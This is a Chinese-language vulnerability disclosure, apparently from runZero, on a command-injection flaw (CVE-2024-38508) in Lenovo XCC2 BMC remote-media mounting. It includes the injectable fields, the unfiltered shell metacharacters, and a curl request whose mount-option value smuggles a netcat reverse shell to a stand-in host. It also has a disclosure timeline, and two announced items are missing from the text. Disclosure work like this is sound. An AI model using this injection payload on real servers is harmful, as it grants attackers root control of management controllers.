挖掘 N-Day:重新發現 Lenovo XCC2 中的 CVE-2024-38508
繼 runZero 在夏季對基板管理控制器 (BMC) 漏洞進行的研究(該研究在 Black Hat USA 2026 和 DEF CON 34 的「Lights Out」簡報中達到高潮)之後,我們正逐步發布我們發現的技術細節。您可以直接透過我們的公告頁面監控這些持續進行的揭露。 如果您是尋求立即映射曝險情況的 runZero 使用者,可以使用以下搜尋查詢在您的網路上隔離活躍的 Lenovo XClarity Controller 2 (XCC2) 執行個體:N-Day 漏洞的現實
在我們的 BMC 分析期間,我們在 Lenovo XCC2 的韌體版本 1.10 中發現了一個嚴重的漏洞。當我們向 Lenovo 的產品安全事件回應團隊 (PSIRT) 揭露該缺陷時,他們迅速確認了其機制,但告知我們已經來晚了。這是一個重複的發現——他們早已在 2024 年於內部發現、修補,並將此問題公開編目為 CVE-2024-38508。 Lenovo 準確地指出,韌體 v1.10 是 2023 年 3 月的早期版本,而最新的疊代版本(v8.80,2026 年 7 月)已不受影響。在網路安全研究領域中,偶然發現一個已記錄且先前已修補的缺陷被稱為「N-day」發現。N-day 的矛盾之處在於,雖然供應商已經盡了本分,但不可避免地,仍有大量目標未經修補,暴露在實際環境中。為何 BMC 仍是首要目標
Lenovo 迅速處理重複報告的做法值得讚賞,但這突顯了 IT 管理中一個長期存在的問題:BMC 極少被修補。更新 BMC 在營運上具有破壞性,需要安排停機時間,且缺乏無縫的自動化功能。因此,BMC 經常被遺忘在網路上,使得它們在修補程式發布很久之後,仍成為攻擊者極具吸引力且脆弱的目標。 這種情況也凸顯了 AI 輔助漏洞獵捕的盲點。即使能全面存取 CVE 資料庫,AI 也無法輕易地將新開發的漏洞利用程式,對應到一個描述模糊的舊 CVE 上。對於 CVE-2024-38508,公開記錄僅提到涉及「命令注入」的「權限提升漏洞」。由於供應商 PSIRT 故意隱瞞特定的漏洞利用細節(如路徑、參數和先決條件),研究人員——及其 AI 工具——通常無從得知某個錯誤是否已知,直到他們直接與供應商接觸。技術剖析:XCC2 中的遠端媒體權限提升
儘管從技術上講這個漏洞是「舊聞」,但發布 CVE-2024-38508 的確切機制對於網路防禦者來說至關重要。了解漏洞利用過程,能讓安全團隊建立有效的偵測規則與入侵指標 (IoC)。核心機制
該缺陷在於 XCC2 遠端媒體傳輸處理 /bin/mount 命令的方式。系統將該命令格式化為單一字串,並將其傳遞給在 xferd 檔案傳輸守護行程內運作的 shell,該守護行程以 root 權限運作。兩個由使用者控制的參數——SMB 網域和掛載選項字串——被直接注入到此命令列中。由於應用程式的字元過濾器不足,無法剔除 shell 中介字元,具有基本遠端媒體(操作員級別)權限的已驗證使用者,即可以 root 身分執行任意命令。漏洞利用影響
這個漏洞對攻擊者極具價值。它能將低層級的已驗證使用者提升至擁有管理控制器的完整 root 存取權。因為它只需要操作員級別的存取權限,而非完整的管理員權限,所以攻擊面更廣。透過經由 xferd 守護行程執行程式碼,攻擊者獲得了對 BMC 的完全控制權,使其能夠操縱配置、竊取憑證、利用帶外主控台存取權,甚至可能樞紐移動到主機作業系統。注入剖析
該漏洞具體存在於 libvmtrans.so 中。mount_remote_folder 函式的建構命令如下:/bin/mount -t %s %s %s %s %s %s %s %s %s。攻擊者控制的 SMB 網域填入 -o domain=”%s” 參數,而掛載選項字串則填滿 -o %s -o timeo=10,retry=0。這整個字串透過 proc_system 執行。 致命缺陷在於套用至 domain 與 mountoption 欄位的字元過濾器。它只拒絕空格、雙引號、撇號、正斜線與驚嘆號。它完全忽略了關鍵的 shell 中介字元,如 ;、$、`、<、>、| 與 &。 透過終止選項字串並附加新命令(例如,mountoption=vers=3.0;<command>),或在網域欄位內使用命令替換(例如,domain=x$(<command>)),即可達成任意執行。 Web 介面利用 JWT 身分驗證,並註冊了 POST /api/providers/rp_vm_remote_connect 端點。以下 curl 命令說明了觸發反向 shell 所需的有效負載:curl -sk -X POST https://example.lan/api/providers/rp_vm_remote_connect \
-H "Authorization: Bearer $JWT" \
-d 'Url=//192.0.2.20/share/boot.iso' \
-d 'Protocol=0' \
-d 'Write=0' \
-d 'Credential=svc:password' \
-d 'Domain=WORKGROUP' \
-d 'Option=vers=3.0;/bin/busybox nc 192.0.2.10 4444 -e /bin/sh'
處理常式不是返回命令輸出,而是返回標準的掛載狀態 ({“return”:0})。在幕後,proc_system() 以 root 身分執行以下有效負載:
揭露時間表
| Date | 里程碑 |
|---|---|
| 2026 年 7 月 18 日 | runZero 發現並記錄漏洞(利用 AI 輔助)。 |
| 2026 年 7 月 21 日 | 保留 CVE-2026-65201。 |
| 2026 年 8 月 28 日 | 透過 VINCE 平台報告給 CERT/CC (VU#216901)。 |
| 2026 年 8 月 31 日 | CERT/CC 正式通知 Lenovo。 |
| 2026 年 9 月 1 日 | CVE-2026-65201 所有權移交給 Lenovo。 |
| 2026 年 9 月 2 日 | Lenovo 通知 CERT/CC 該報告為 CVE-2024-38508 的重複報告。 |
| 2026 年 9 月 17 日 | runZero 與 CERT/CC 證實 CVE-2024-38508 識別無誤。 |
| 2026 年 9 月 21 日 | 與 Lenovo 分享揭露草稿;進行小幅技術修改。 |
| 2026 年 9 月 23 日 | 發布公開技術揭露。 |
關於 runZero
runZero 是一種網路發現和資產庫存解決方案,由 Metasploit 的創建者 HD Moore 於 2018 年創立。 HD 設想了一種現代主動發現解決方案,無需憑證即可找到和識別網路上的所有內容。 作為一名安全研究員和滲透測試人員,他經常採用良性的方式來獲取資訊洩漏並將它們拼湊起來以建立設備配置文件。 最終,這項工作促使他利用應用研究和為安全和滲透測試開發的發現技術來創建 runZero。
About Version 2
Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.


